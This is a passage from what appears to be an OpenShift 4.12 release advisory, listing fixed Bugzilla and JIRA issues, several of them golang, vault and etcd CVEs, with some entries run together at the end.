2117439 - change controlplanemachineset machineType to other type trigger RollingUpdate cause cluster error
2117474 - ccoctl panics while trying to create a secret from credential request which does not have providerspec within it
2117524 - openshift-ingress-operator with mTLS does not download CRL
2117569 - kube-controller-manager needs to stop watching all events
2117595 - Upgrade golangci-lint to 1.47.3 in image-customization-controller
2117602 - LocalVolume does support by-path volumes
2117646 - Changing `spec.host` field on any of routes in the openshift-console namespace wont trigger sync loop
2117738 - Plugin page error boundary message is not cleared after leaving page
2117749 - Bump to latest k8s.io 1.24 release
2117822 - oc adm release extract should handle ccoctl
2118286 - KCMO should not be dependent on monitoring stack
2118318 - kube-controller-manager resource quota controller needs to stop watching all events
2118550 - [capi] azure and vsphere image in payload
2118563 - [OSP][SDN] The displayed IP Capacity is not consistent with port allowed maximum addresses
2118625 - [Nutanix] ccoctl panics if nutanix credentials source file and openshift credentials requests files are in the same directory
2124668 - CVE-2022-32190 golang: net/url: JoinPath does not strip relative path components in all circumstances
2132867 - CVE-2022-2879 golang: archive/tar: unbounded memory consumption when reading headers
2132868 - CVE-2022-2880 golang: net/http/httputil: ReverseProxy should not forward unparseable query parameters
2132872 - CVE-2022-41715 golang: regexp/syntax: limit memory used by parsing regexps
2135339 - CVE-2022-41316 vault: insufficient certificate revocation list checking
2161287 - CVE-2023-0296 openshift: etcd grpc-proxy vulnerable to The Birthday attack against 64-bit block cipher

5. JIRA issues fixed (https://issues.jboss.org/):

OCPBUGS-1000 - Allow scale-down of unhealthy member when it doesn't violate quorum
OCPBUGS-1004 - The error message of "opm alpha render-veneer semver" is not correct
OCPBUGS-1017 - Can't cancel login when using multi-cluster
OCPBUGS-1029 - Developer catalog fails to load
OCPBUGS-1038 - Whereabouts reconciliation should be launched by the CNO when using a conflist
OCPBUGS-1044 - There's an issue with node-exporter pods running when using a bare metal AMD EPYC setup
OCPBUGS-1049 - Pod security policy change breaks cluster-ingress-operator's TestCanaryRoute E2E tests
OCPBUGS-1067 - [vsphere-CSI-Driver-Operator] The storageclass "thin-csi" could not be re-created after deleting
OCPBUGS-1068 - Correct namespace for SimpleContentAccessNotAvailable
OCPBUGS-1069 - Update ODC owners
OCPBUGS-1076 - CNO in HyperShift management cluster is reconciling ovn-kubemaster in Hosted Control Plane namespace.
OCPBUGS-1080 - It's not possible to share BMC secrets between BareMetalHosts
OCPBUGS-1083 - e2e-aws-ovn-serial fails because of OVNKubernetesControllerDisconnectedSouthboundDatabase
OCPBUGS-1105 - Import a Devfile on a disconnected cluster with a proxy doesn't work
OCPBUGS-1106 - Devfile Catalog and Import a Devfile on a fully disconnected cluster should fail directly instead of timeout after 30sec
OCPBUGS-1132 - e2e: perfprof: unbreak the e2e-gcp PAO lane
OCPBUGS-122 - Error: open /etc/nsswitch.conf: permission denied and Error: open ./db-609956243: permission denied
OCPBUGS-1226 - OpenStack UPI scripts do not create server group for Computes
OCPBUGS-1227 - Node events create unnecessary CPU load
OCPBUGS-1231 - base image can't be fetched in a disconnected environment
OCPBUGS-1234 - AWS tagging limit hit issue when trying to add more than 10 tags
OCPBUGS-1237 - e2e-gcp-builds is permafailing
OCPBUGS-1244 - Add PowerVS region mon01 to installer
OCPBUGS-1247 - AWS Control Plane machine set are breaking single node clusters
OCPBUGS-1256 - [CI-Watcher] e2e issue with tests: Using OLM descriptor components. Using OLM descriptor components deletes operand
OCPBUGS-1257 - Keepalived health check causes unnecessary VIP flapping when HAProxy is healthy
OCPBUGS-1263 - cri-o should report the stage of container and pod creation it's stuck at
OCPBUGS-1268 - HelmChartRepositories has no action menu if the default repo is disabled
OCPBUGS-1274 - machine-api-termination-handler Pods don't launch on tainted spot instances
OCPBUGS-1290 - Update Kafka Sink text description
OCPBUGS-1318 - Dual stack cluster fails on installation when multi-path routing entries exist
OCPBUGS-1321 - node_exporter collects metrics for "virtual" network interfaces
OCPBUGS-1324 - Clusters with a custom osImage cannot be upgraded
OCPBUGS-1329 - etcd and kube-apiserver pods get restarted due to failed liveness probes while deleting/re-creating pods on SNO
OCPBUGS-1351 - health_statuses_insights metrics is showing disabled rules in "total"
OCPBUGS-1353 - ETCD Operator goes degraded when a second internal node ip is added
OCPBUGS-1361 - Expect more detail info when report vSphere privilege alert
OCPBUGS-1364 - Improve prometheus-adapter consistency
OCPBUGS-1402 - panic in cvo pod
OCPBUGS-1409 - E2E: intermittent failure is seen on tests for devfile
OCPBUGS-1416 - ODC add-page e2e tests doesn't pass (outdated checks)
OCPBUGS-1417 - Disconnected Openshift cluster on AWS having problem with manual egress IP assignment
OCPBUGS-1421 - Document how to use RWX vSphere volumes
OCPBUGS-1429 - get updated rpm-ostree in 4.12 bootimages
OCPBUGS-1434 - Downstream Autoscaling Eviction Annotation to OCP 4.12
OCPBUGS-1437 - OLM Reports ResolutionFailed when there are multiple upgrade paths between channel entries
OCPBUGS-1456 - Cluster operator-related tests failing on techpreview because of "platform-operators-aggregated"
OCPBUGS-1470 - i18n: Incorrect plural for maxUnavailable pod count
OCPBUGS-1479 - PDB list page should only show Create Pod button to user has sufficient permission
OCPBUGS-1482 - Can't install clusters with schedulable masters
OCPBUGS-1484 - Remove policy/v1beta1 in 4.11 and later
OCPBUGS-1489 - [vsphere] one vm folder is not deleted when destroying ocp cluster configured region/zone
OCPBUGS-1498 - e2e: performance: Verify kernel param rcutree.kthread
OCPBUGS-1502 - PodNetworkConnectivityCheck gatherer reads too much data into memory
OCPBUGS-1503 - configure-ovs.sh fails on unrelated, invalid connection files (non-existing interfaces)
OCPBUGS-1505 - Booting live ISO: /dev/sr0 already mounted or mount point busy
OCPBUGS-1512 - [OCP 4.12] Fix generate script in CBO
OCPBUGS-1515 - Join network CIDR not accept v6InternalSubnet fdxx::/48
OCPBUGS-1522 - Regular user cannot open the debug container from pods they created
OCPBUGS-1533 - sdn rebase to 1.25
OCPBUGS-1549 - DNS operator does not reconcile the openshift-dns namespace
OCPBUGS-1554 - Bump cluster-ingress-operator to k8s 1.25
OCPBUGS-1558 - Bump cluster-dns-operator to k8s 1.25
OCPBUGS-1569 - OBC and OB option showing twice to user of a Project on Console
OCPBUGS-1570 - Event Sources not shown in topology
OCPBUGS-1616 - masters unavailable & mco degraded in bootstrap techpreview jobs
OCPBUGS-1621 - The CSV of the operator does not have timestamp
OCPBUGS-1629 - Facing issue while configuring egress IP pool in OCP cluster which uses STS
OCPBUGS-1636 - The platform-operators-aggregated cannot be created after enabling TechPreviewNoUpgrade
OCPBUGS-1641 - irqbalance: add unit to clear the cpu ban list
OCPBUGS-1645 - CPMS should handle clusters where Masters are not indexed from 0
OCPBUGS-165 - Spike in pod-latency graph observed due to ovnkube-master restarts
OCPBUGS-1677 - CI: Backend unit tests fails because devfile registry was updated (fix assertion)
OCPBUGS-1678 - CI: Backend unit tests fails because devfile registry was updated (mock response)
OCPBUGS-169 - Console e2e tests broken due to pod security admission controller
OCPBUGS-1698 - [vsphere] Installer get panic error when no setting platform.vsphere.failureDomains.topology.networks
OCPBUGS-1705 - OVN-Kubernetes master crashing due to too long ACL names during upgrade
OCPBUGS-1708 - console.openshift.io/use-i18n false in v1alpha API is converted to "" in the v1 APi, which is not a valid value for the enum type declared in the code.
OCPBUGS-171 - VirtualMediaViaExternalNetwork is broken with virtual media TLS
OCPBUGS-1717 - Image registry panics while deploying OCP in me-central-1 AWS region
OCPBUGS-1718 - prometheus-k8s-0 ends in CrashLoopBackOff with evel=error err="opening storage failed: /prometheus/chunks_head/000002: invalid magic number 0" on SNO after hard reboot tests
OCPBUGS-1730 - Bump openshift-router to k8s 1.25
OCPBUGS-1731 - Rebase CoreDNS to 1.10.0, based on k8s 1.25
OCPBUGS-1736 - cncc crashloop in proxy deployments
OCPBUGS-1746 - Update the Github App events and permissions
OCPBUGS-1776 - Duplicate "Getting Started" notification will show on Search page for normal user
OCPBUGS-1789 - Users can't silence alerts from the dev console when dedicated UWM Alertmanager is deployed
OCPBUGS-1799 - Ironic API proxy pods crash loop if IPv6 is used
OCPBUGS-180 - Name of "Role" should keep pace with the name in CLI
OCPBUGS-1806 - OCP cluster install on baremetal fails when hostname of master nodes does not include the text "master" (take 2)
OCPBUGS-1810 - must gather for gather_ingress_node_firewall breaks with permission issues
OCPBUGS-1824 - Systemd service been deactivated in limited network environment
OCPBUGS-1825 - Ingress Node Firewall rule becomes non-functional when daemons and controller manager deployment are re-deployed
OCPBUGS-1827 - knative service e2e tests are failing
OCPBUGS-183 - Log line numbers overlap with cut-off rule when number is too big
OCPBUGS-1831 - failed to run command in pod with network-tools script pod-run-netns-command locally
OCPBUGS-184 - [OCP web console] Wrong message "404: Not found" while the user selects an installed operator and navigates from operator hub to installed operator page.
OCPBUGS-1853 - [OVNK] ARP doesn't exist for v6: https://github.com/j-keck/arping/
OCPBUGS-1856 - [IBMCloud] install private cluster need manually add a rule to the security group for *sg-kube-api-lb
OCPBUGS-1877 - download 'aliyun'
OCPBUGS-1880 - Openshift version upgrade cause multiple worker go in draining node
OCPBUGS-1881 - [vSphere] cluster destroy get stuck if vm have not tag attached
OCPBUGS-1896 - [CORS-2260] "create install-config" got error 'credentialsMode: Forbidden: environmental authentication is only supported with Manual credentials mode'
OCPBUGS-1900 - Bootstrap error in SNO installation
OCPBUGS-1904 - CSI driver operators are degraded without "CSISnapshot" capability
OCPBUGS-1912 - downstream `opm alpha diff` moving to `oc-mirror`
OCPBUGS-1913 - Agent Installer: Do not fail on deprecated apiVip and ingressVip values
OCPBUGS-1916 - Workloads list page has different HPA action items from details page when All Projects selected
OCPBUGS-193 - Kebab menu not working properly for helm repository
OCPBUGS-194 - Layout for API Explorer page is incorrect
OCPBUGS-1941 - [4.12] Bootimage bump tracker
OCPBUGS-1949 - kube-controller log gatherer should limit number of bytes read
OCPBUGS-1950 - Devfile samples (in Developer Catalog) link doesn't include the current selected namespace
OCPBUGS-1962 - Controller and speakers are not created with tolerations effect is NoScheduleNoSchedule and tolerationSeconds is set 10
OCPBUGS-1979 - Update openshift/etcd Go version to 1.16
OCPBUGS-198 - Kuryr-Controller Restarting on KuryrPort with missing pod
OCPBUGS-1992 - [osp][octavia lb] failing to create floating IP for external LB
OCPBUGS-1994 - Unrevert needed for jsonnet deps update PR
OCPBUGS-2004 - egressip healthcheck through GRPC on dualstack cluster only uses v6 address when trying to re-connect to egressIP node
OCPBUGS-2009 - User should be warned that MetalLB controller pod config node affinity cannot have weight 0
OCPBUGS-2010 - [noop][4.12] ironic clear_job_queue and reset_idrac pending issues
OCPBUGS-2029 - proxy config in installconfig fails to be applied
OCPBUGS-2052 - [4.12] boot sequence override request fails with Base.1.8.PropertyNotWritable on Lenovo SE450
OCPBUGS-2063 - List pages in pipelines is taking more time to load when there are too many items
OCPBUGS-2071 - revert "force cert rotation every couple days for development" in 4.12
OCPBUGS-2075 - Do not show notification switch for the alert rule which have no alerts associated
OCPBUGS-2076 - CI AWS CCM cluster install failure
OCPBUGS-2079 - systemReserved:ephemeral-storage in KubeletConfig doesn't work as expected
OCPBUGS-208 - Race condition when creating / deleting mac_address_pairs
OCPBUGS-2086 - Detect failure to prepare installation
OCPBUGS-2100 - Alert icon color is black in the Topology list view
OCPBUGS-2102 - Resource quota e2e tests fails after latest changes to master
OCPBUGS-212 - co/kube-controller-manager degraded: GarbageCollectorDegraded: error fetching rules: Get "https://thanos-querier.openshift-monitoring.svc:9091/api/v1/rules": dial tcp 172.30.153.28:9091: connect: cannot assign requested address
OCPBUGS-2122 - machine-config-daemon failed to update the OS for cluster running behind proxy
OCPBUGS-2125 - CVO skips reconciling the installed optional resources in the 4.11 to 4.12 upgrade
OCPBUGS-2138 - Get OSImageURL override related metric data available in telemetry
OCPBUGS-2151 - machine-api-operator degraded during 3+1 deployment due to minimum worker replica count is 2
OCPBUGS-2152 - RHCOS VM fails to boot on IBM Power (ppc64le) - 4.12
OCPBUGS-2155 - Etcd scaling test was mistakenly added to the parallel suite
OCPBUGS-2157 - Documentation for cleaning crio produces kubelet errors
OCPBUGS-2158 - Track changes of serviceAccountIssuer in operator status
OCPBUGS-216 - kuryr-controller timing out liveness probe
OCPBUGS-2167 - Workload hints feature breaks backwards compatibility
OCPBUGS-2175 - Windows to linux networking broken since downstream OVN merge
OCPBUGS-2181 - e2e tests: Installs Red Hat Integration - 3scale operator test is failing due to change of Operator name
OCPBUGS-2195 - NPE on visiting topology for ns which got deleted
OCPBUGS-2197 - [upgrade 4.11.z to 4.12 nightly] rpm-ostree update via container failed
OCPBUGS-2219 - ConsolePlugin CRs cannot be garbage collected due to missing spec.i18n.loadType value
OCPBUGS-2223 - Default catalogSources are not updated to 4.12
OCPBUGS-2227 - VPA Operator not enabled in 4.12
OCPBUGS-224 - Missing $SEARCH domain in /etc/resolve.conf for OCP v4.9.31 cluster
OCPBUGS-2249 - Conditional gatherer cluster_version_matches issues
OCPBUGS-2262 - [gcp][CORS-1774] "platform.gcp.publicDNSZone" and "platform.gcp.privateDNSZone" should be for existing DNS zones
OCPBUGS-2265 - Allow passing documentation links for alerts
OCPBUGS-2269 - "error: No enabled repositories" on upgrade with kernelType: realtime enabled
OCPBUGS-2301 - [gcp][CORS-1774] with "createFirewallRules: Enabled", after successful "create cluster" and then "destroy cluster", the created firewall-rules in the shared VPC are not deleted
OCPBUGS-2316 - Ingress-node-Firewall:Mixing ICMP v4 and v6 config causes a panic
OCPBUGS-2322 - Kuryr does not accept application credentials
OCPBUGS-2325 - Add e2e test cases for INF spec.ingress
OCPBUGS-2327 - Add validation for releaseImage and mirror
OCPBUGS-2328 - Panic observed: runtime error: index out of range
OCPBUGS-2330 - events.events.k8s.io is forbidden: User "system:serviceaccount:openshift-kube-descheduler-operator:openshift-descheduler-operand" cannot create resource "events" in API group "events.k8s.io" in the namespace "e2e-test-default-b6y9atnu-jxz6p"
OCPBUGS-2334 - NE-956: Configurable LB Source Ranges breaks TestScopeChange
OCPBUGS-2338 - Confusing error messages when missing VIPs
OCPBUGS-2340 - OnDelete update strategy cannot work when master machines are not index as 0, 1, 2
OCPBUGS-2346 - Remove namespace and name from gathered DVO metrics
OCPBUGS-2354 - co/storage is not available due to csi driver not have proxy setting on ibm cloud
OCPBUGS-236 - custom ingress-controller can't be deleted
OCPBUGS-2360 - [IPI on Baremetal] ipv6 support issue in metal3-httpd
OCPBUGS-2362 - OVN-K alerts must be set to the correct severity level
OCPBUGS-2369 - NPE on topology if creates a k8s svc and KSVC which has no metadata in template
OCPBUGS-2372 - Duplicate addresses when the controller is restarted
OCPBUGS-2373 - When changing a lb service to another type, the freed ip is not reused
OCPBUGS-238 - ReEnable e2e tests for knative
OCPBUGS-2396 - FIPS jobs are broken after images rebuilt with golang 1.19
OCPBUGS-2435 - Nil-pointer dereference in TestRouterCompressionOperation on e2e-gcp-operator
OCPBUGS-2436 - Installer fails to create ingress.config.openshift.io/cluster on AWS because of missing spec.loadBalancer.platform.aws.type
OCPBUGS-2437 - Clusters with large numbers of CSVs can cause crashloop, block upgrades
OCPBUGS-2438 - Help popovers cause error on Observe > Alerting pages
OCPBUGS-2446 - Control Plane Machine Set does not expose errors
OCPBUGS-2455 - Pods and PDBs list page just reports 'Not found' when no Pod/PDB
OCPBUGS-246 - Incorrect retry cause false positive in CNF tests
OCPBUGS-2469 - ControlPlaneMachineSets are not included in must-gathers
OCPBUGS-2478 - i18n translation missing in "Remove component node from application" modal
OCPBUGS-2495 - 'oc login' should be robust in the face of gather failures
OCPBUGS-2508 - Worker creation fails within provider networks (as primary and secondary)
OCPBUGS-2512 - apiserver pods cannot reach etcd on single node IPv6 cluster: transport: authentication handshake failed: x509: certificate is valid for ::1, 127.0.0.1, ::1, fd69::2, not 2620:52:0:198::10"
OCPBUGS-2558 - [RFE] Add new Azure instance types to the official "tested/supported" list
OCPBUGS-256 - intra namespace allow network policy doesn't work after applying ingress&egress deny all network policy
OCPBUGS-2592 - CVO hot-loops on Deployment manifests
OCPBUGS-262 - downloading govc is impacted by github rate limiting
OCPBUGS-2621 - Enable TechPreview cause cluster error on single node cluster
OCPBUGS-2635 - Ingress operator degraded during 3+1 deployment due to insufficient worker nodes
OCPBUGS-2638 - Switch libvirt VM's to vnc graphic mode
OCPBUGS-2651 - Pipeline Run nodes should show focus border
OCPBUGS-2654 - Console OLM Integration Tests Reference Operator Not Present in 4.12 Certified Operators CatalogSource
OCPBUGS-2656 - VPA E2Es fail due to CSV name mismatch
OCPBUGS-268 - vsphere: installer for vsphere does not have steal clock accounting enabled
OCPBUGS-270 - Dev Catalog taking too much time to load in a complete disconnected cluster
OCPBUGS-2726 - Descheduler SoftTopologyAndDuplicates uses Stategy RemovePodsViolatingTopologySpreadConstraint which has invalid mapping
OCPBUGS-2741 - CPMS failureDomains is not keep consistent with master machines on heterogeneous cluster after upgrade from 4.11 to 4.12
OCPBUGS-2757 - rebase should handle idempotency
OCPBUGS-2774 - [AWS][GCP] the new created nodes are not added to load balancer
OCPBUGS-2775 - After added/removed label from a namespace, one stats of "route_metrics_controller_routes_per_shard" in Observe >> Metrics page aren't correct
OCPBUGS-2779 - Import: Advanced option sentence is splited into two parts and headlines has no padding
OCPBUGS-2803 - Project auth cache sync blocks list handler
OCPBUGS-2822 - [4.12] EFS csi controller&driver pod are CrashLoopBackOff due to csi-driver container is not running on arm.
OCPBUGS-2826 - ovnkube-trace: ofproto/trace fails for IPv6
OCPBUGS-2837 - Excessive debug logs
OCPBUGS-2848 - Routes per shard metric inaccurate if using matchExpression
OCPBUGS-2854 - Controlplanmachineset couldn't be created after deleting a machineset
OCPBUGS-2874 - Add Capacity button does not exist after upgrade OCP version [OCP4.11->OCP4.12]
OCPBUGS-2896 - Refactor retry logic into a separate pkg
OCPBUGS-2909 - Invalid documentation link in knative-plugin README
OCPBUGS-2915 - InsightsRecommendationActive should link cluster-specific page
OCPBUGS-2918 - Update Prometheus Alerts
OCPBUGS-2927 - CI jobs are failing with: admission webhook "validation.csi.vsphere.vmware.com" denied the request
OCPBUGS-2974 - administrator console, monitoring-alertmanager-edit user list or create silence, "Observe - Alerting - Silences" page is pending
OCPBUGS-2975 - PTP 4.12 - PTP - AMQ HTTP on event caused ptp stopped working after fresh deployment
OCPBUGS-2979 - [4.12] automatic replacement of an unhealthy member machine
OCPBUGS-2984 - [RFE] 4.12 Azure DiskEncryptionSet static validation does not support upper-case letters
OCPBUGS-2995 - [4.12] Unable to gather OpenStack console logs since kernel cmd line has no console args
OCPBUGS-2997 - [4.12] Bootimage bump tracker
OCPBUGS-2998 - OCP 4.12 Driver Toolkit (DTK) mismatch in kernel package and node kernel versions
OCPBUGS-3003 - Ignore non-ready endpoints when processing endpointslices
OCPBUGS-3019 - Ingress node firewall pod 's events container on the node causing pod in CrashLoopBackOff state when sctp module is loaded on node
OCPBUGS-302 - openshift-install gather bootstrap panics
OCPBUGS-3022 - GCP: missing multiple regions
OCPBUGS-3028 - panic in WaitForBootstrapComplete
OCPBUGS-3035 - 4.12 backport: Multiple extra manifests in the same file are not applied correctly
OCPBUGS-3037 - [apiserver-auth] default SCC restricted allow volumes don't have "ephemeral" caused deployment with Generic Ephemeral Volumes stuck at Pending
OCPBUGS-305 - Cluster-version operator ClusterOperator checks are unecessarily slow on update
OCPBUGS-3055 - 4.12 backport: Wait-for install-complete did not exit upon completion.
OCPBUGS-3071 - [4.12][AWS] curl network Loadbalancer always get "Connection time out"
OCPBUGS-3075 - [4.12] ovn-k network policy races
OCPBUGS-3080 - [4.12] RPS hook only sets the first queue, but there are now many
OCPBUGS-3081 - monitor not working with UDP lb when externalTrafficPolicy: Local
OCPBUGS-3094 - [4.12] The control plane should tag AWS security groups at creation
OCPBUGS-3111 - metal3 pod crashloops on OKD in BareMetal IPI or assisted-installer bare metal installations
OCPBUGS-3115 - [2117255] Failed to dump flows for flow sync, stderr: "ovs-ofctl: br-ext is not a bridge or a socket"
OCPBUGS-3175 - CIRO unable to detect swift when it speaks HTTP2
OCPBUGS-3177 - RHCOS 4.12/s390x kdump is failling, disable test
OCPBUGS-3179 - Regression in ptp-operator conformance tests
OCPBUGS-3194 - [4.12.z backport][4.8][OVN] RHEL 7.9 DHCP worker ovs-configuration fails
OCPBUGS-3204 - Permission denied when write data to mounted gcp filestore volume instance
OCPBUGS-3208 - [4.12] SCOS build fails due to pinned kernel
OCPBUGS-3249 - CVE-2022-27191 ose-installer-container: golang: crash in a golang.org/x/crypto/ssh server [openshift-4]
OCPBUGS-3263 - The terraform binaries shipped by the installer are not statically linked
OCPBUGS-3265 - Console shouldn't try to install dynamic plugins if permissions aren't available
OCPBUGS-3276 - Pin down dependencies on CMO release 4.12
OCPBUGS-3279 - Service-ca controller exits immediately with an error on sigterm
OCPBUGS-3281 - OCP 4.10.33 uses a weak 3DES cipher in the VMWare CSI Operator for communication and provides no method to disable it
OCPBUGS-3289 - [IBMCloud] Worker machines unreachable during initial bring up
OCPBUGS-3293 - WriteRequestBodies audit profile records routes/status events at RequestResponse level
OCPBUGS-3297 - Bugfix in privileged-daemonset and better dependencies
OCPBUGS-3306 - Agent installer does not support dualstack VIPs
OCPBUGS-3307 - [gcp] when the optional Service Usage API is disabled, IPI installation cannot succeed
OCPBUGS-3311 - [alibabacloud] IPI installation failed with master nodes being NotReady and CCM error "alicloud: unable to split instanceid and region from providerID"
OCPBUGS-3333 - Console should be using v1 apiVersion for ConsolePlugin model
OCPBUGS-3340 - Environment cannot find Python
OCPBUGS-3343 - [vsphere] installation fails when setting user-defined folder in failure domain
OCPBUGS-3346 - [perf/scale] libovsdb builds transaction logs but throws them away
OCPBUGS-3348 - 4.12: When adding nodes, the overlapped node-subnet can be allocated.
OCPBUGS-3352 - ClusterVersionRecommendedUpdate condition blocks explicitly allowed upgrade which is not in the available updates
OCPBUGS-3359 - Revert BUILD-407
OCPBUGS-3363 - openshift-ingress-operator with mTLS does not download CRL
OCPBUGS-3366 - Disconnected cluster installation fails with pull secret must contain auth for "registry.ci.openshift.org"
OCPBUGS-3378 - [OVN]Sometimes after reboot egress node, egress IP cannot be applied anymore.
OCPBUGS-3379 - [release-4.12] CephCluster and StorageCluster resources use the same paths
OCPBUGS-3390 - [release-4.12] 4.11 SNOs fail to complete install because of "failed to get pod annotation: timed out waiting for annotations: context deadline exceeded"
OCPBUGS-3397 - Avoid re-metric'ing the pods that are already setup when ovnkube-master disrupts/reinitializes/restarts/goes through leader election
OCPBUGS-3398 - 4.12 backport: Unable to configure cluster-wide proxy
OCPBUGS-3406 - [gcp][CORS-1774] with both "id" and "project" specified for "privateDNSZone", it seems installer doesn't horner "project"
OCPBUGS-3425 - [release-4.12] Azure Disk CSI Driver Operator gets degraded without "CSISnapshot" capability
OCPBUGS-3428 - [4.12] Skip broken [sig-devex][Feature:ImageEcosystem] tests
OCPBUGS-3436 - domain 24 missing from phc2sys options
OCPBUGS-3437 - cloud-network-config-controller not using proxy settings of the management cluster
OCPBUGS-3442 - Datastore name is too long
OCPBUGS-3443 - [4.12] Descheduler pod is OOM killed when using descheduler-operator profiles on big clusters
OCPBUGS-3455 - track `rhcos-4.12` branch for fedora-coreos-config submodule
OCPBUGS-3459 - Installer does not always add router CA to kubeconfig
OCPBUGS-346 - Failed to create volumesnapshotcontent for gcp-filestore-csi-driver-operator
OCPBUGS-3464 - IBM operator needs deployment manifest fixes
OCPBUGS-3468 - Disable check_pkt_length in OVN-K for OvS Hardware Offload Cases
OCPBUGS-3479 - [4.12] Baremetal Provisioning fails on HP Gen9 systems due to eTag handling
OCPBUGS-3483 - Minor test fixes related to getting updated profile and checking kubeletconfiguration
OCPBUGS-3493 - [Ingress Node Firewall Operator] [Web Console] Allow user to override namespace where the operator is installed, currently user can install it only in openshift-operators ns
OCPBUGS-3503 - CRD-based and openshift-apiserver-based Route validation/defaulting must use the shared implementation
OCPBUGS-3504 - [4.12] Incorrect network configuration in worker node with two interfaces
OCPBUGS-3510 - Update cluster-authentication-operator not to go degraded without console
OCPBUGS-3515 - Need validation rule for supported arch
OCPBUGS-3519 - Assisted service should always use first matching mirror for release image
OCPBUGS-3520 - Install ends in preparing-failed due to container-images-available validation
OCPBUGS-3523 - Operator attempts to render both GA and Tech Preview API Extensions
OCPBUGS-3557 - [4.12] provisioning of baremetal nodes fails when using multipath device as rootDeviceHints
OCPBUGS-3571 - Placeholder bug for OCP 4.12.0 metadata release
OCPBUGS-3639 - The architecture field in sig image definition for hyperVGeneration V1 needs to match rhcos_image architecture
OCPBUGS-364 - Update ose-baremetal-installer images to be consistent with ART
OCPBUGS-3650 - EUS upgrade stuck on worker pool update: error running skopeo inspect --no-tags
OCPBUGS-3651 - DaemonSet "/openshift-network-diagnostics/network-check-target" is not available
OCPBUGS-3658 - OVN-Kubernetes should not send IPs with leading zeros to OVN
OCPBUGS-3663 - don't enforce PSa in 4.12
OCPBUGS-3694 - [4.12] Router e2e: drop template.openshift.io apigroup dependency
OCPBUGS-3696 - Surface ClusterVersion RetrievedUpdates condition messages
OCPBUGS-3700 - [osp][octavia lb] NodePort allocation cannot be disabled for LB type svcs
OCPBUGS-3754 - Create Alertmanager silence form does not explain the new "Negative matcher" option
OCPBUGS-3763 - PTP operator: Use priority class node critical
OCPBUGS-3770 - cvo pod crashloop during bootstrap: featuregates: connection refused
OCPBUGS-3772 - Default for spec.to.weight missing from Route CRD schema
OCPBUGS-3774 - Unable to use application credentials for Cinder CSI after OpenStack credentials update
OCPBUGS-3780 - Route CRD validation behavior must be the same as openshift-apiserver behavior
OCPBUGS-3786 - Should show information on page if the upgrade to a target version doesn't take effect.
OCPBUGS-3798 - [4.12] Bump OVS control plane to get "ovsdb/transaction.c: Refactor assess_weak_refs."
OCPBUGS-3811 - Automation Offline CPUs Test cases
OCPBUGS-3824 - [4.12] Ipsec pods restart due to liveness probes fail in cluster with more than 150 +
OCPBUGS-3837 - service account token secret reference
OCPBUGS-384 - GCP Filestore csi operator has wrong spec.description in csv files
OCPBUGS-3841 - Remove flowcontrol/v1beta1 release manifests in 4.12 and later
OCPBUGS-3851 - [4.12][Dual Stack] ovn-ipsec crashlooping due to cert signing issues
OCPBUGS-3871 - Container networking pods cannot be access hosted network pods on another node in ipv6 single stack cluster
OCPBUGS-3874 - masters repeatedly losing connection to API and going NotReady
OCPBUGS-3875
- Route CRD host-assignment behavior must be the same as openshift-apiserver behaviorOCPBUGS-3878 - RouteTargetReference missing default for "weight" in Route CRD v1 schemaOCPBUGS-3881 - Revert Catalog PSA decisions for 4.12OCPBUGS-3884 - [Ingress Node Firewall] Change the logo used for ingress node firewall operatorOCPBUGS-3889 - Egress router POD creation is failing while using openshift-sdn network pluginOCPBUGS-3890 - [ibmcloud] unclear error msg when zones is not match with the Subnets in BYON installOCPBUGS-3899 - [2035720] [IPI on Alibabacloud] deploying a private cluster by 'publish: Internal' failed due to 'dns_public_record'OCPBUGS-392 - Setting disableNetworkDiagnostics: true does not persist when network-operator pod gets re-createdOCPBUGS-3927 - "Error loading" when normal user check operands on All namespacesOCPBUGS-3930 - Local Storage Operator (LSO) not available in OperatorHub for OCP 4.12 on Z ec.5 and rc.0 buildsOCPBUGS-3944 - Handle 0600 kubeconfigOCPBUGS-3956 - CNO reporting incorrect statusOCPBUGS-3958 - [4.12] Use kernel-rt from ose repoOCPBUGS-3966 - must-gather namespace should have ?privileged? warn and audit pod security labels besides enforceOCPBUGS-4001 - fix operator naming convention OCPBUGS-4004 - Consistent e2e test failure:Events.Events: event view displays created podOCPBUGS-4013 - On Make Serverless page, to change values of the inputs minpod, maxpod and concurrency fields, we need to click the ? + ? or ? 
- ', it can't be changed by typing in it.OCPBUGS-4035 - Topology gets stuck loadingOCPBUGS-4040 - Authentication operator doesn't respond to console being enabledOCPBUGS-4043 - [2109965] oci hook Low-latency-hooks causing high container creation times under platform cpu loadOCPBUGS-4048 - Prometheus doesn't reload TLS certificate and key files on diskOCPBUGS-4063 - Fails to deprovision cluster when swift omits 'content-type'OCPBUGS-4064 - Install failure in create-cluster-and-infraenv.serviceOCPBUGS-4068 - Shouldn't need to put host data in platform baremetal section in installconfigOCPBUGS-407 - [2116382] Setting a telemeter proxy in the cluster-monitoring-config config map does not work as expectedOCPBUGS-4083 - CCM not able to remove a LB in ERROR stateOCPBUGS-4097 - [IPI-BareMetal]: Dual stack deployment failed on BootStrap stage  OCPBUGS-4098 - [4.12] Egress IP Health Check Is Not Compatible With VF (Hardware Backed) Management PortOCPBUGS-4112 - Remove autoscaling/v2beta2 in 4.12 and laterOCPBUGS-4116 - Re-enable pipeline CI testsOCPBUGS-4117 - Re-enable serverless CI testsOCPBUGS-4118 - Kube-State-metrics pod fails to start due to panicOCPBUGS-4121 - [SNO] csi-snapshot-controller CO is degraded when upgrade from 4.12 to 4.13 and reports permissions issue. OCPBUGS-416 - [IBMCloud] The udevadm utility is missing in the IBM Cloud VPC block storage IPI imageOCPBUGS-418 - [OCP web console]  Search result doesn't clear when user clears name filter in one-shot for any resourcesOCPBUGS-4183 - Upgrades from 4.11.9 to latest 4.12.x Nightly builds do not succeedOCPBUGS-4189 - Route CRD vs. 
